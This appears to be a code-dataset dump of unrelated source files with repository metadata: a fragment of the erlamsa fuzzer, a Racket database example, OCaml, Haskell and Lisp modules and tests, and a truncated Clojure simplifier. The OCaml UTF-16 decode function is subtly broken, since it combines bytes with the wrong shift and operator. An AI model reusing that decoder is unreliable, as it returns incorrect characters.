Val = maps:get(Name, SelectedMutas, notfound),
case Val of
notfound -> Acc;
_Else -> [{Score, Val, F, Name} | Acc]
end
end,
[],
mutations(CustomMutas)),
mutators_mutator(Mutas).
-spec mutators_mutator([mutation()]) -> fun().
mutators_mutator(Mutas) ->
mutators_mutator(Mutas, []).
-spec mutators_mutator([mutation()], [mutation()]) -> fun().
mutators_mutator([], Out) ->
mux_fuzzers(Out);
mutators_mutator([{_, Pri, F, Name}|T], Out) ->
N = erlamsa_rnd:rand(trunc(?MAX_SCORE)),
mutators_mutator(T, [{max(2, N), Pri, F, Name} | Out]).
|
688b45e0dee86e0ab36212696beae4b1c2242539767c801efbb4118066117a2e | Bogdanp/deta | books.rkt | #lang racket/base
(require db
deta
threading)
(define-schema book
([id id/f #:primary-key #:auto-increment]
[title string/f]
[author string/f]
[year-published integer/f #:nullable]))
(define conn
(sqlite3-connect #:database 'memory))
(void
(create-table! conn 'book)
(insert! conn
(make-book #:title "To Kill a Mockingbird"
#:author "Harper Lee"
#:year-published 1960)
(make-book #:title "1984"
#:author "George Orwell"
#:year-published 1949)
(make-book #:title "The Lord of the Rings"
#:author "J.R.R. Tolkien"
#:year-published 1955)
(make-book #:title "The Catcher in the Rye"
#:author "J.D. Salinger"
#:year-published 1949)))
(define (books-before year)
(~> (from book #:as b)
(where (< b.year-published ,year))))
(define (books-between start-year end-year)
(~> (from book #:as b)
(where (between b.year-published ,start-year ,end-year))))
(displayln "Books published before 1950:")
(for ([b (in-entities conn (books-before 1950))])
(displayln (book-title b)))
(displayln "")
(displayln "Books published between 1950 and 1970:")
(for ([b (in-entities conn (books-between 1950 1970))])
(displayln (book-title b)))
(define-schema book-stats
#:virtual
([year integer/f]
[books integer/f]))
(displayln "")
(displayln "Statistics:")
(for ([stats (in-entities conn (~> (from book #:as b)
(select b.year-published (count *))
(group-by b.year-published)
(order-by ([b.year-published #:desc]))
(project-onto book-stats-schema)))])
(displayln (format "year: ~a books: ~a"
(book-stats-year stats)
(book-stats-books stats))))
(query-exec conn (delete (books-between 1950 1970)))
(displayln "")
(displayln "Books published between 1950 and 1970:")
(for ([b (in-entities conn (books-between 1950 1970))])
(displayln (book-title b)))
| null | https://raw.githubusercontent.com/Bogdanp/deta/503860156f5cb1dbecb4339e299ee86a10b66d32/examples/books.rkt | racket | #lang racket/base
(require db
deta
threading)
(define-schema book
([id id/f #:primary-key #:auto-increment]
[title string/f]
[author string/f]
[year-published integer/f #:nullable]))
(define conn
(sqlite3-connect #:database 'memory))
(void
(create-table! conn 'book)
(insert! conn
(make-book #:title "To Kill a Mockingbird"
#:author "Harper Lee"
#:year-published 1960)
(make-book #:title "1984"
#:author "George Orwell"
#:year-published 1949)
(make-book #:title "The Lord of the Rings"
#:author "J.R.R. Tolkien"
#:year-published 1955)
(make-book #:title "The Catcher in the Rye"
#:author "J.D. Salinger"
#:year-published 1949)))
(define (books-before year)
(~> (from book #:as b)
(where (< b.year-published ,year))))
(define (books-between start-year end-year)
(~> (from book #:as b)
(where (between b.year-published ,start-year ,end-year))))
(displayln "Books published before 1950:")
(for ([b (in-entities conn (books-before 1950))])
(displayln (book-title b)))
(displayln "")
(displayln "Books published between 1950 and 1970:")
(for ([b (in-entities conn (books-between 1950 1970))])
(displayln (book-title b)))
(define-schema book-stats
#:virtual
([year integer/f]
[books integer/f]))
(displayln "")
(displayln "Statistics:")
(for ([stats (in-entities conn (~> (from book #:as b)
(select b.year-published (count *))
(group-by b.year-published)
(order-by ([b.year-published #:desc]))
(project-onto book-stats-schema)))])
(displayln (format "year: ~a books: ~a"
(book-stats-year stats)
(book-stats-books stats))))
(query-exec conn (delete (books-between 1950 1970)))
(displayln "")
(displayln "Books published between 1950 and 1970:")
(for ([b (in-entities conn (books-between 1950 1970))])
(displayln (book-title b)))
| |
34d4191f664328d4bd1876518ec671c83f2d710eacfe9971a0c125d23ece53b1 | ayazhafiz/plts | load.ml | let string_of_position ({ pos_lnum; pos_cnum; pos_bol; _ } : Lexing.position) =
Printf.sprintf "%d:%d" pos_lnum (pos_cnum - pos_bol + 1)
let parse_safe s =
let lexbuf = Lexing.from_string ~with_positions:true s in
try
let parsed = Parser.formula_entry Lexer.read lexbuf in
Ok parsed
with
| Lexer.SyntaxError what ->
Error
(Printf.sprintf "Syntax error: %s at %s" what
(string_of_position lexbuf.lex_curr_p))
| Parser.Error ->
Error
(Printf.sprintf "Parse error at %s"
(string_of_position lexbuf.lex_curr_p))
let parse s = Result.get_ok (parse_safe s)
| null | https://raw.githubusercontent.com/ayazhafiz/plts/ea0cb5ab8f5fb98e421c4a2dc8577b2454d86442/logic/load.ml | ocaml | let string_of_position ({ pos_lnum; pos_cnum; pos_bol; _ } : Lexing.position) =
Printf.sprintf "%d:%d" pos_lnum (pos_cnum - pos_bol + 1)
let parse_safe s =
let lexbuf = Lexing.from_string ~with_positions:true s in
try
let parsed = Parser.formula_entry Lexer.read lexbuf in
Ok parsed
with
| Lexer.SyntaxError what ->
Error
(Printf.sprintf "Syntax error: %s at %s" what
(string_of_position lexbuf.lex_curr_p))
| Parser.Error ->
Error
(Printf.sprintf "Parse error at %s"
(string_of_position lexbuf.lex_curr_p))
let parse s = Result.get_ok (parse_safe s)
| |
87a23649ac2c602484df45ffea68970d057a4fb08dddc938a274a724ea93508a | dbuenzli/hyperbib | suggestion_html.mli | ---------------------------------------------------------------------------
Copyright ( c ) 2022 The hyperbib programmers . All rights reserved .
Distributed under the ISC license , see terms at the end of the file .
---------------------------------------------------------------------------
Copyright (c) 2022 The hyperbib programmers. All rights reserved.
Distributed under the ISC license, see terms at the end of the file.
---------------------------------------------------------------------------*)
open Hyperbib.Std
val page_404 : Page.Gen.t -> self:Kurl.t -> Page.t
val email_field : string
val bot_honeypot_field : string
val confirm_delete :
Page.Gen.t -> Suggestion.t -> El.html
val suggest_form :
?force_rescue:bool -> ?msg:El.html -> Page.Gen.t -> Suggestion.t -> El.html
val created : Page.Gen.t -> Suggestion.t -> Page.t
val view_fields :
?no_ui:bool -> Page.Gen.t -> self:Kurl.t -> Suggestion.t -> El.html
val integrate : Page.Gen.t -> Suggestion.t -> form:El.html -> Page.t
val need_a_doi_or_suggestion : El.html
val index : Page.Gen.t -> Suggestion.t list -> is_full:bool -> Page.t
---------------------------------------------------------------------------
Copyright ( c ) 2022 The hyperbib programmers
Permission to use , copy , modify , and/or distribute this software for any
purpose with or without fee is hereby granted , provided that the above
copyright notice and this permission notice appear in all copies .
THE SOFTWARE IS PROVIDED " AS IS " AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS . IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL , DIRECT , INDIRECT , OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
RESULTING FROM LOSS OF USE , DATA OR PROFITS , WHETHER IN AN
ACTION OF CONTRACT , NEGLIGENCE OR OTHER TORTIOUS ACTION , ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE .
---------------------------------------------------------------------------
Copyright (c) 2022 The hyperbib programmers
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
---------------------------------------------------------------------------*)
| null | https://raw.githubusercontent.com/dbuenzli/hyperbib/a1def764f7f58b29bd732dacaa167e73497f6175/src/html/suggestion_html.mli | ocaml | ---------------------------------------------------------------------------
Copyright ( c ) 2022 The hyperbib programmers . All rights reserved .
Distributed under the ISC license , see terms at the end of the file .
---------------------------------------------------------------------------
Copyright (c) 2022 The hyperbib programmers. All rights reserved.
Distributed under the ISC license, see terms at the end of the file.
---------------------------------------------------------------------------*)
open Hyperbib.Std
val page_404 : Page.Gen.t -> self:Kurl.t -> Page.t
val email_field : string
val bot_honeypot_field : string
val confirm_delete :
Page.Gen.t -> Suggestion.t -> El.html
val suggest_form :
?force_rescue:bool -> ?msg:El.html -> Page.Gen.t -> Suggestion.t -> El.html
val created : Page.Gen.t -> Suggestion.t -> Page.t
val view_fields :
?no_ui:bool -> Page.Gen.t -> self:Kurl.t -> Suggestion.t -> El.html
val integrate : Page.Gen.t -> Suggestion.t -> form:El.html -> Page.t
val need_a_doi_or_suggestion : El.html
val index : Page.Gen.t -> Suggestion.t list -> is_full:bool -> Page.t
---------------------------------------------------------------------------
Copyright ( c ) 2022 The hyperbib programmers
Permission to use , copy , modify , and/or distribute this software for any
purpose with or without fee is hereby granted , provided that the above
copyright notice and this permission notice appear in all copies .
THE SOFTWARE IS PROVIDED " AS IS " AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS . IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL , DIRECT , INDIRECT , OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
RESULTING FROM LOSS OF USE , DATA OR PROFITS , WHETHER IN AN
ACTION OF CONTRACT , NEGLIGENCE OR OTHER TORTIOUS ACTION , ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE .
---------------------------------------------------------------------------
Copyright (c) 2022 The hyperbib programmers
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
---------------------------------------------------------------------------*)
| |
4ec54abee64878b1274eb68b98f241891ef903717301c1ff35631b17d83b7166 | ItsMeijers/Lambdabox | Extended.hs | {-# LANGUAGE OverloadedStrings #-}
module Data.Aeson.Extended
( module Data.Aeson
, module Data.Aeson.Types
, typeToKindOptions
, Unit(..)
) where
import Data.Aeson
import Data.Aeson.Types
typeToKindOptions :: Options
typeToKindOptions = defaultOptions { fieldLabelModifier = t2k }
where t2k "kind" = "type"
t2k name = name
data Unit = Unit
instance FromJSON Unit where
parseJSON _ = pure Unit | null | https://raw.githubusercontent.com/ItsMeijers/Lambdabox/c19a8ae7d37b9f8ab5054d558fe788a5d4483092/src/Data/Aeson/Extended.hs | haskell | # LANGUAGE OverloadedStrings # |
module Data.Aeson.Extended
( module Data.Aeson
, module Data.Aeson.Types
, typeToKindOptions
, Unit(..)
) where
import Data.Aeson
import Data.Aeson.Types
typeToKindOptions :: Options
typeToKindOptions = defaultOptions { fieldLabelModifier = t2k }
where t2k "kind" = "type"
t2k name = name
data Unit = Unit
instance FromJSON Unit where
parseJSON _ = pure Unit |
d082df553e73ea25a71f68b1b6a149fef0cf6b027eb87c918b003b7881fe2382 | hspec/sensei | HTTPSpec.hs | {-# LANGUAGE OverloadedStrings #-}
module HTTPSpec (spec) where
import Helper
import Test.Hspec.Wai
import HTTP
spec :: Spec
spec = do
describe "app" $ do
with (return $ app $ return (True, "hello")) $ do
it "returns 200 on success" $ do
get "/" `shouldRespondWith` 200
with (return $ app $ return (False, "hello")) $ do
it "return 500 on failure" $ do
get "/" `shouldRespondWith` 500
| null | https://raw.githubusercontent.com/hspec/sensei/1af44981b3448d1298e6a363e037ea2978cc6392/test/HTTPSpec.hs | haskell | # LANGUAGE OverloadedStrings # | module HTTPSpec (spec) where
import Helper
import Test.Hspec.Wai
import HTTP
spec :: Spec
spec = do
describe "app" $ do
with (return $ app $ return (True, "hello")) $ do
it "returns 200 on success" $ do
get "/" `shouldRespondWith` 200
with (return $ app $ return (False, "hello")) $ do
it "return 500 on failure" $ do
get "/" `shouldRespondWith` 500
|
f42a45f2e9ba7b4934be2e48f03f440c24dba2771454c414963f3ecdc5a0d24f | patoline/patoline | UTF16.ml | open UChar
include UTF.Make(
struct
* Encode a unicode character into a UTF16 string .
* Argument :
* i : the unicode character .
* Returns a string of size either 2 or 4 .
* Raise invalid_arg if i is not in the U+0000 .. U+10FFFF range .
* Encode a unicode character into a UTF16 string.
* Argument:
* i : the unicode character.
* Returns a string of size either 2 or 4.
* Raise invalid_arg if i is not in the U+0000..U+10FFFF range.
*)
let encode : uchar -> string = fun u ->
if u < 0 || u > 0x10FFFF then
raise (invalid_arg "UF16.encode")
else if u < 0x10000 then
let s = Bytes.create 2 in
Bytes.set s 0 (char_of_int ((u lsr 8) land 0xFF));
Bytes.set s 1 (char_of_int (u land 0xFF));
Bytes.to_string s
else
let u' = u - 0x10000 in
let w1 = ((u' lsr 10) land 0b1111111111) lor 0xD800 in
let w2 = (u' land 0b1111111111) lor 0xDC00 in
let s = Bytes.create 4 in
Bytes.set s 0 (char_of_int ((w1 lsr 8) land 0xFF));
Bytes.set s 1 (char_of_int (w1 land 0xFF));
Bytes.set s 2 (char_of_int ((w2 lsr 8) land 0xFF));
Bytes.set s 3 (char_of_int (w2 land 0xFF));
Bytes.to_string s
(*
* Decode a UTF16 character at a given position in a string.
* Arguments:
* s : the string,
* i : index where to look.
* Returns a couple (c, l) where c is the code of the character and l is the
* number of bytes read.
* Raise invalid_arg if no valid UTF16 character starts at poisition i in s.
*)
let decode : string -> index -> (uchar * int) = fun s i ->
let l = String.length s in
if i > l - 1 then
raise (invalid_arg "UTF16.decode")
else
let w1 = ((Char.code s.[i]) lsl 16) land (Char.code s.[i+1]) in
if w1 < 0xD800 || w1 > 0xDFFF then
(w1, 2)
else if w1 >= 0xD800 && w1 <= 0xD8FF then
raise (invalid_arg "UTF16.decode")
else if i > l - 3 then
raise (invalid_arg "UTF16.decode")
else
let w2 = ((Char.code s.[i+2]) lsl 16) land (Char.code s.[i+3]) in
if w2 < 0xDC00 || w2 > 0xDFFF then
raise (invalid_arg "UTF16.decode")
else
let u1 = w1 land 0b1111111111 in
let u2 = w2 land 0b1111111111 in
let u = (u1 lsl 10) lor u2 in
let u = u + 0x10000 in
(u, 4)
end)
| null | https://raw.githubusercontent.com/patoline/patoline/3dcd41fdff64895d795d4a78baa27d572b161081/unicodelib/UTF16.ml | ocaml |
* Decode a UTF16 character at a given position in a string.
* Arguments:
* s : the string,
* i : index where to look.
* Returns a couple (c, l) where c is the code of the character and l is the
* number of bytes read.
* Raise invalid_arg if no valid UTF16 character starts at poisition i in s.
| open UChar
include UTF.Make(
struct
* Encode a unicode character into a UTF16 string .
* Argument :
* i : the unicode character .
* Returns a string of size either 2 or 4 .
* Raise invalid_arg if i is not in the U+0000 .. U+10FFFF range .
* Encode a unicode character into a UTF16 string.
* Argument:
* i : the unicode character.
* Returns a string of size either 2 or 4.
* Raise invalid_arg if i is not in the U+0000..U+10FFFF range.
*)
let encode : uchar -> string = fun u ->
if u < 0 || u > 0x10FFFF then
raise (invalid_arg "UF16.encode")
else if u < 0x10000 then
let s = Bytes.create 2 in
Bytes.set s 0 (char_of_int ((u lsr 8) land 0xFF));
Bytes.set s 1 (char_of_int (u land 0xFF));
Bytes.to_string s
else
let u' = u - 0x10000 in
let w1 = ((u' lsr 10) land 0b1111111111) lor 0xD800 in
let w2 = (u' land 0b1111111111) lor 0xDC00 in
let s = Bytes.create 4 in
Bytes.set s 0 (char_of_int ((w1 lsr 8) land 0xFF));
Bytes.set s 1 (char_of_int (w1 land 0xFF));
Bytes.set s 2 (char_of_int ((w2 lsr 8) land 0xFF));
Bytes.set s 3 (char_of_int (w2 land 0xFF));
Bytes.to_string s
let decode : string -> index -> (uchar * int) = fun s i ->
let l = String.length s in
if i > l - 1 then
raise (invalid_arg "UTF16.decode")
else
let w1 = ((Char.code s.[i]) lsl 16) land (Char.code s.[i+1]) in
if w1 < 0xD800 || w1 > 0xDFFF then
(w1, 2)
else if w1 >= 0xD800 && w1 <= 0xD8FF then
raise (invalid_arg "UTF16.decode")
else if i > l - 3 then
raise (invalid_arg "UTF16.decode")
else
let w2 = ((Char.code s.[i+2]) lsl 16) land (Char.code s.[i+3]) in
if w2 < 0xDC00 || w2 > 0xDFFF then
raise (invalid_arg "UTF16.decode")
else
let u1 = w1 land 0b1111111111 in
let u2 = w2 land 0b1111111111 in
let u = (u1 lsl 10) lor u2 in
let u = u + 0x10000 in
(u, 4)
end)
|
774cbd7c452870040fcc84b6398f007587b34aa8ffe4dc3af4486d95126c4962 | McCLIM/McCLIM | sequence.lisp | ;;; ---------------------------------------------------------------------------
;;; License: LGPL-2.1+ (See file 'Copyright' for details).
;;; ---------------------------------------------------------------------------
;;;
( c ) copyright 2019 - 2020 Jan Moringen < >
;;;
;;; ---------------------------------------------------------------------------
;;;
;;; Smoke test for inspecting sequences.
;;;
(cl:in-package #:clouseau.test)
(def-suite* :clouseau.objects.sequence
:in :clouseau)
(defclass my-sequence (sequence standard-object)
())
(defmethod sequence:length ((sequence my-sequence))
3)
(defmethod sequence:elt ((sequence my-sequence) (index t))
(case index
(0 :a)
(1 :b)
(2 :c)))
(test sequence.object-state-class.smoke
"Test `object-state-class' for extended sequences."
(object-state-class-cases
(list (make-instance 'my-sequence) 'clouseau::inspected-extended-sequence)))
| null | https://raw.githubusercontent.com/McCLIM/McCLIM/7c890f1ac79f0c6f36866c47af89398e2f05b343/Apps/Clouseau/test/objects/sequence.lisp | lisp | ---------------------------------------------------------------------------
License: LGPL-2.1+ (See file 'Copyright' for details).
---------------------------------------------------------------------------
---------------------------------------------------------------------------
Smoke test for inspecting sequences.
| ( c ) copyright 2019 - 2020 Jan Moringen < >
(cl:in-package #:clouseau.test)
(def-suite* :clouseau.objects.sequence
:in :clouseau)
(defclass my-sequence (sequence standard-object)
())
(defmethod sequence:length ((sequence my-sequence))
3)
(defmethod sequence:elt ((sequence my-sequence) (index t))
(case index
(0 :a)
(1 :b)
(2 :c)))
(test sequence.object-state-class.smoke
"Test `object-state-class' for extended sequences."
(object-state-class-cases
(list (make-instance 'my-sequence) 'clouseau::inspected-extended-sequence)))
|
e3d02779b5f6c9a61d2bb376a8cb4869834ce9260e9636610ca7c56b888e0e5e | robert-strandh/Cluster | generation-test.lisp | (cl:in-package #:cluster-test.disassembler)
(defun test-all-x86 ()
(let* ((generator (make-code-command-generator))
(test-program
(generate-test-commands generator c::*instruction-descriptors*)))
(assert-assembler-equal-encoding test-program)))
| null | https://raw.githubusercontent.com/robert-strandh/Cluster/370410b1c685f2afd77f959a46ba49923a31a33c/Test/Disassembler/generation-test.lisp | lisp | (cl:in-package #:cluster-test.disassembler)
(defun test-all-x86 ()
(let* ((generator (make-code-command-generator))
(test-program
(generate-test-commands generator c::*instruction-descriptors*)))
(assert-assembler-equal-encoding test-program)))
| |
852d44519f86f647355354b024233397a7f1ededf8067be810094ed0c9edc5f1 | sicmutils/sicmutils | simplify.cljc | #_"SPDX-License-Identifier: GPL-3.0"
(ns sicmutils.simplify
(:require [sicmutils.expression :as x]
[sicmutils.expression.analyze :as a]
[sicmutils.polynomial :as poly]
[sicmutils.polynomial.factor :as factor]
[sicmutils.rational-function :as rf]
[sicmutils.simplify.rules :as rules]
[sicmutils.value :as v]
[taoensso.timbre :as log])
#?(:clj
(:import (java.util.concurrent TimeoutException))))
(defn- unless-timeout
"Returns a function that invokes f, but catches TimeoutException;
if that exception is caught, then x is returned in lieu of (f x)."
[f]
(fn [x]
(try (f x)
(catch #?(:clj TimeoutException :cljs js/Error) _
(log/warn
(str "simplifier timed out: must have been a complicated expression"))
x))))
(defn ^:no-doc poly-analyzer
"An analyzer capable of simplifying sums and products, but unable to cancel
across the fraction bar.
NOTE: I think this is fpf:analyzer in the scheme code."
[]
(let [gensym (a/monotonic-symbol-generator "-s-")]
(a/make-analyzer poly/analyzer gensym)))
(defn ^:no-doc rational-function-analyzer
"An analyzer capable of simplifying expressions built out of rational
functions.
NOTE: This is rcf:analyzer."
[]
(let [gensym (a/monotonic-symbol-generator "-r-")]
(a/make-analyzer rf/analyzer gensym)))
(def ^:dynamic *poly-simplify*
(memoize
(a/expression-simplifier
(poly-analyzer))))
(def ^:dynamic *rf-simplify*
(unless-timeout
(memoize
(a/expression-simplifier
(rational-function-analyzer)))))
(defn hermetic-simplify-fixture
"Returns the result of executing the supplied `thunk` in an environment where
the [[*rf-simplify*]] and [[*poly-simplify*]] are not memoized."
[thunk]
(binding [*rf-simplify* (unless-timeout
(a/expression-simplifier
(rational-function-analyzer)))
*poly-simplify* (unless-timeout
(a/expression-simplifier
(poly-analyzer)))]
(thunk)))
(defn- simplify-and-flatten [expr]
(*poly-simplify*
(*rf-simplify* expr)))
(defn- simplify-until-stable
[rule-simplify canonicalize]
(fn [expr]
(let [new-expr (rule-simplify expr)]
(if (= expr new-expr)
expr
(let [canonicalized-expr (canonicalize new-expr)]
(cond (= canonicalized-expr expr) expr
(v/zero?
(*poly-simplify*
(list '- expr canonicalized-expr)))
canonicalized-expr
:else (recur canonicalized-expr)))))))
(defn- simplify-and-canonicalize
[rule-simplify canonicalize]
(fn [expr]
(let [new-expr (rule-simplify expr)]
(if (= expr new-expr)
expr
(canonicalize new-expr)))))
(def ^:private clear-square-roots-of-perfect-squares
(-> (comp (rules/universal-reductions #'*rf-simplify*)
factor/root-out-squares)
(simplify-and-canonicalize simplify-and-flatten)))
(defn- only-if
"If the supplied `bool` is true, returns `f`, else returns `identity`."
[bool f]
(if bool
f
identity))
(let [universal-reductions (rules/universal-reductions #'*rf-simplify*)
sqrt-contract (rules/sqrt-contract #'*rf-simplify*)
sqrt-expand (rules/sqrt-expand #'*rf-simplify*)
log-contract (rules/log-contract #'*rf-simplify*)
sincos-random (rules/sincos-random #'*rf-simplify*)
sincos-flush-ones (rules/sincos-flush-ones #'*rf-simplify*)]
(defn simplify-expression
"Simplifies an expression representing a complex number. TODO say more!"
[expr]
(let [syms (x/variables-in expr)
sqrt? (rules/occurs-in? #{'sqrt} syms)
full-sqrt? (and rules/*sqrt-factor-simplify?*
(rules/occurs-in? #{'sqrt} syms))
logexp? (rules/occurs-in? #{'log 'exp} syms)
trig? (rules/occurs-in? #{'sin 'cos 'tan 'cot 'sec 'csc} syms)
partials? (rules/occurs-in? #{'partial} syms)
simple
(comp (only-if rules/*divide-numbers-through-simplify?*
rules/divide-numbers-through)
(only-if sqrt? clear-square-roots-of-perfect-squares)
(only-if full-sqrt?
(comp (-> (comp universal-reductions sqrt-expand)
(simplify-until-stable simplify-and-flatten))
clear-square-roots-of-perfect-squares
(-> sqrt-contract
(simplify-until-stable simplify-and-flatten))))
(only-if trig?
(comp (-> (comp universal-reductions rules/sincos->trig)
(simplify-and-canonicalize simplify-and-flatten))
(-> rules/complex-trig
(simplify-and-canonicalize simplify-and-flatten))
(-> rules/angular-parity
(simplify-and-canonicalize simplify-and-flatten))
(-> sincos-random
(simplify-until-stable simplify-and-flatten))
(-> rules/sin-sq->cos-sq
(simplify-and-canonicalize simplify-and-flatten))
(-> sincos-flush-ones
(simplify-and-canonicalize simplify-and-flatten))
(only-if rules/*trig-product-to-sum-simplify?*
(-> rules/trig:product->sum
(simplify-and-canonicalize simplify-and-flatten)))
(-> universal-reductions
(simplify-and-canonicalize simplify-and-flatten))
(-> sincos-random
(simplify-until-stable simplify-and-flatten))
(-> rules/sin-sq->cos-sq
(simplify-and-canonicalize simplify-and-flatten))
(-> sincos-flush-ones
(simplify-and-canonicalize simplify-and-flatten))))
(only-if logexp?
(comp (-> universal-reductions
(simplify-and-canonicalize simplify-and-flatten))
(-> (comp rules/log-expand
rules/exp-expand)
(simplify-until-stable simplify-and-flatten))
(-> (comp log-contract
rules/exp-contract)
(simplify-until-stable simplify-and-flatten))))
(-> (comp universal-reductions
(only-if logexp?
(comp rules/log-expand
rules/exp-expand))
(only-if sqrt?
sqrt-expand))
(simplify-until-stable simplify-and-flatten))
(only-if trig?
(-> rules/angular-parity
(simplify-and-canonicalize simplify-and-flatten)))
(-> rules/trig->sincos
(simplify-and-canonicalize simplify-and-flatten))
TODO this should happen at the END , only a single time , after
;; everything else is done. It's not right to get operator
;; multiplication going and then attempt to canonicalize the
;; expression, even if it sort of works.
(only-if partials?
(-> rules/canonicalize-partials
(simplify-and-canonicalize simplify-and-flatten)))
simplify-and-flatten)]
(simple expr))))
| null | https://raw.githubusercontent.com/sicmutils/sicmutils/ce763b31153eb9253f165bd5b4e4e6a6087bf730/src/sicmutils/simplify.cljc | clojure |
everything else is done. It's not right to get operator
multiplication going and then attempt to canonicalize the
expression, even if it sort of works. | #_"SPDX-License-Identifier: GPL-3.0"
(ns sicmutils.simplify
(:require [sicmutils.expression :as x]
[sicmutils.expression.analyze :as a]
[sicmutils.polynomial :as poly]
[sicmutils.polynomial.factor :as factor]
[sicmutils.rational-function :as rf]
[sicmutils.simplify.rules :as rules]
[sicmutils.value :as v]
[taoensso.timbre :as log])
#?(:clj
(:import (java.util.concurrent TimeoutException))))
(defn- unless-timeout
if that exception is caught, then x is returned in lieu of (f x)."
[f]
(fn [x]
(try (f x)
(catch #?(:clj TimeoutException :cljs js/Error) _
(log/warn
(str "simplifier timed out: must have been a complicated expression"))
x))))
(defn ^:no-doc poly-analyzer
"An analyzer capable of simplifying sums and products, but unable to cancel
across the fraction bar.
NOTE: I think this is fpf:analyzer in the scheme code."
[]
(let [gensym (a/monotonic-symbol-generator "-s-")]
(a/make-analyzer poly/analyzer gensym)))
(defn ^:no-doc rational-function-analyzer
"An analyzer capable of simplifying expressions built out of rational
functions.
NOTE: This is rcf:analyzer."
[]
(let [gensym (a/monotonic-symbol-generator "-r-")]
(a/make-analyzer rf/analyzer gensym)))
(def ^:dynamic *poly-simplify*
(memoize
(a/expression-simplifier
(poly-analyzer))))
(def ^:dynamic *rf-simplify*
(unless-timeout
(memoize
(a/expression-simplifier
(rational-function-analyzer)))))
(defn hermetic-simplify-fixture
"Returns the result of executing the supplied `thunk` in an environment where
the [[*rf-simplify*]] and [[*poly-simplify*]] are not memoized."
[thunk]
(binding [*rf-simplify* (unless-timeout
(a/expression-simplifier
(rational-function-analyzer)))
*poly-simplify* (unless-timeout
(a/expression-simplifier
(poly-analyzer)))]
(thunk)))
(defn- simplify-and-flatten [expr]
(*poly-simplify*
(*rf-simplify* expr)))
(defn- simplify-until-stable
[rule-simplify canonicalize]
(fn [expr]
(let [new-expr (rule-simplify expr)]
(if (= expr new-expr)
expr
(let [canonicalized-expr (canonicalize new-expr)]
(cond (= canonicalized-expr expr) expr
(v/zero?
(*poly-simplify*
(list '- expr canonicalized-expr)))
canonicalized-expr
:else (recur canonicalized-expr)))))))
(defn- simplify-and-canonicalize
[rule-simplify canonicalize]
(fn [expr]
(let [new-expr (rule-simplify expr)]
(if (= expr new-expr)
expr
(canonicalize new-expr)))))
(def ^:private clear-square-roots-of-perfect-squares
(-> (comp (rules/universal-reductions #'*rf-simplify*)
factor/root-out-squares)
(simplify-and-canonicalize simplify-and-flatten)))
(defn- only-if
"If the supplied `bool` is true, returns `f`, else returns `identity`."
[bool f]
(if bool
f
identity))
(let [universal-reductions (rules/universal-reductions #'*rf-simplify*)
sqrt-contract (rules/sqrt-contract #'*rf-simplify*)
sqrt-expand (rules/sqrt-expand #'*rf-simplify*)
log-contract (rules/log-contract #'*rf-simplify*)
sincos-random (rules/sincos-random #'*rf-simplify*)
sincos-flush-ones (rules/sincos-flush-ones #'*rf-simplify*)]
(defn simplify-expression
"Simplifies an expression representing a complex number. TODO say more!"
[expr]
(let [syms (x/variables-in expr)
sqrt? (rules/occurs-in? #{'sqrt} syms)
full-sqrt? (and rules/*sqrt-factor-simplify?*
(rules/occurs-in? #{'sqrt} syms))
logexp? (rules/occurs-in? #{'log 'exp} syms)
trig? (rules/occurs-in? #{'sin 'cos 'tan 'cot 'sec 'csc} syms)
partials? (rules/occurs-in? #{'partial} syms)
simple
(comp (only-if rules/*divide-numbers-through-simplify?*
rules/divide-numbers-through)
(only-if sqrt? clear-square-roots-of-perfect-squares)
(only-if full-sqrt?
(comp (-> (comp universal-reductions sqrt-expand)
(simplify-until-stable simplify-and-flatten))
clear-square-roots-of-perfect-squares
(-> sqrt-contract
(simplify-until-stable simplify-and-flatten))))
(only-if trig?
(comp (-> (comp universal-reductions rules/sincos->trig)
(simplify-and-canonicalize simplify-and-flatten))
(-> rules/complex-trig
(simplify-and-canonicalize simplify-and-flatten))
(-> rules/angular-parity
(simplify-and-canonicalize simplify-and-flatten))
(-> sincos-random
(simplify-until-stable simplify-and-flatten))
(-> rules/sin-sq->cos-sq
(simplify-and-canonicalize simplify-and-flatten))
(-> sincos-flush-ones
(simplify-and-canonicalize simplify-and-flatten))
(only-if rules/*trig-product-to-sum-simplify?*
(-> rules/trig:product->sum
(simplify-and-canonicalize simplify-and-flatten)))
